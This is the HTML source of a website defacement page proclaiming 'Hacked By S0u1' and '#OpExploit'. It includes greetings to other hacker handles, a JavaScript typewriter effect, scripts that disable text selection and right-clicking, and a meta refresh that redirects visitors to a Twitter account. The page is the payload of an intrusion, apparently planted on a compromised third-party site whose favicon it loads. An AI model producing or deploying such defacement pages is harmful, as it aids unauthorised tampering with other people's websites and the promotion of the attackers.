<html>
<center>
<meta http-equiv="refresh" content="9;url=https://twitter.com/S0u1_HLoTW" />
<head>



    <title>Uh..Oh.. [!] HACKED [!] </title>


    <link href="http://www.separateurhydrocarbures.com/templates/ja_purity_ii/favicon.ico" rel="shortcut icon" type="image/x-icon">
    <style type="text/css">
        body {
            background: black url("http://i44.tinypic.com/1248upv.jpg");
            background-repeat: repeat;
            background-position: center;
            background-attachment: fixed;
    </style>
</head>

<body onload=writetext() onLoad="setTimeout('delayer()', 2000)" style="background-image: url('')">
<div id="fb-root"></div>
<body>

    <p align=center></p>
    <SCRIPT language=JavaScript>
        msg = new Array(); //strings written in screen
        msg[0] = "<h2><font face='Courier' color='#00FF00' new size='4'><center><br>Hacked By  S0u1 </center></font></h2>";
        msg[1] = "<font face='Courier' color='#00FF00' new size='3'><center> #OpExploit </center><br><br></font> </b>";
        msg[2] = "<font face='Courier' color='#FFFFFF' new size='2'>Test .... test... test... rest. <br><br><br>";
        msg[3] = "<font face='Courier' color='#00FFFF'><center>Greetz: S0u1, C0d3c0rrup7, Ch405, Lulz Zombie, Pr0T0x1c  </center><br></font>";
        msg[4] = "<font face='Courier' color='#FFFFFF' new size='4'><center>S0u1<br></center><br>";
        msg[5] = "<font face='Courier' color='#3D8B37' new size='4'><center><br></center><br>";
        text1 = ""; //the same as text2, only the last character is highlighted
        text2 = ""; //current string, which will be written
        count = 0; //char index in string text
        count2 = 0; //number of strings
        text = msg[0].split(""); //text - string written
        function writetext() { //show strings above on screen
            text1 = text2 + "<font color='#FFFFFF'>" + text[count] + "</font>";
            text2 += text[count];
            document.all["nothing"].innerHTML = text1; //where to write
            if (count < text.length - 1) {




                count++;




                setTimeout('writetext()', 20);




            } else { //if this string is written, get the new string




                count = 0;




                if (count2 != 15) { //write 15 strings




                    count2++;




                    text2 += ""; //a new line




                    text = eval('msg[' + count2 + '].split("")'); //get the new string to text




                    setTimeout('writetext()', 1);




                }




            }




        }
    </SCRIPT>





    <SCRIPT LANGUAGE="JavaScript">
        <!-- Disable




        function disableselect(e) {




            return false




        }




        function reEnable() {




            return true




        }




        //if IE4+




        document.onselectstart = new Function("return false")




        document.oncontextmenu = new Function("return false")




        //if NS6




        if (window.sidebar) {




            document.onmousedown = disableselect




            document.onclick = reEnable




        }




        //-->
    </script>





    <DIV id=nothing style="FONT-FAMILY: 'Courier'">





        <H2><U>



<CENTER>---= Hacked by S0u1 =----</CENTER></U></H2>




        <P>
            <B>---= =----<FONT face=Courier color=#00FF00>---=Hacked by S0u1=----



</FONT>

</B>
        </P>





        <P>Waiting...</P>%2